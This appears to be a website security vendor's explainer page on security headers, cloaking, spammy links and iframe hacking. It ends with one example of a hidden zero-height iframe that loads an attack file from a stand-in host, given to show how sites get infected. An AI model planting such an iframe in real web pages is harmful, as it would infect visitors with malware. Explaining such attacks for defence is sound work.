Browser Security | Security Headers

Browser Security Check, Website Security Headers scan, Cloaking, Bad Iframes and Spammy Looking Links check are just a few of Protectumus features.

What are security headers?

The security headers by the name can explain that are the commands the web applications to configure security measures in the web browsers. The security headers can prevent many client websites from getting hacked or cyberattacked by online hackers.

Why are they essential for your site protection?

There are several benefits of using a good security header. Nowadays, too much data hacking and breaching are happening which is why security breaches are important for websites. Some of the most useful and essential security headers for your website are stated below.

Security Haders examples

1) Content Security Policy is an effective measure to protect your site from XSS attacks. By whitelisting sources of approved content, you can prevent the browser from loading malicious assets.
2) X-Frame-Options tells the browser whether you want to allow your site to be framed or not. By preventing a browser from framing your site you can defend against attacks like clickjacking. Recommended value "X-Frame-Options: SAMEORIGIN".
3) X-Content-Type-Options stops a browser from trying to MIME-sniff the content type and forces it to stick with the declared content-type. The only valid value for this header is "X-Content-Type-Options: nosniff".
4) Referrer Policy is a new header that allows a site to control how much information the browser includes with navigations away from a document and should be set by all sites.
5) Permissions Policy is a new header that allows a site to control which features and APIs can be used in the browser.

What is Cloaking?

Cloaking is a search engine optimization technique in which the content presented to the search engine spider is different from that presented to the user's browser. This is done by delivering content based on the IP addresses or the User-Agent HTTP header of the user requesting the page.

What are Spammy Looking Links?

Spammy looking links are urls identified as harmful. They might link to Nude content, Pharma SEO Hacking, Dark Net or other dangerous content applications. Protectumus identifies thousands of spammy looking links and notifies website owners about possible web content infections.

What are Iframes?

Essentially, an iframe is a HTML document that is embedded inside another document on a website, allowing you to include content from external sources on your pages.

Payment processing gateways use Iframes in order to secure the payment information, so no one would be able to scrape your data from external sources. YouTube is also using Iframes to allow users to embed clips into their websites.

What is Iframe Hacking?

The name Iframe Hacking has been derived from the manner in which the hacking is done using an iframe tag. Iframe is short for inline frame, and is essentially the name of an html tag - < iframe > < / iframe >. Iframe tags can be used to insert contents from another website within a web page as if they were part of the current page. While this may be useful for building user-friendly web applications and for cross-site scripting purposes, hackers misuse this feature to insert contents from their own malicious website.

In an IFrame attack, the hacker embeds a malicious iframe code snippet in your website page. When anyone visits that page, the hidden iframe code secretly downloads and installs a Trojan or a malware such as key-logger on the unsuspecting user's computer, if his computer is not adequately protected. Thus over a short period of time several of your site visitors' computers would get infected. Very soon your website will get known as a source of virus and may get blacklisted from the internet community. Even search engines will ban your website, causing severe damage to your reputation and business.

Below is an example of a hidden iframe code embed in a web page:

< iframe src="http://hackersite.com/attackfile.php" width=100% height=0 > < /iframe >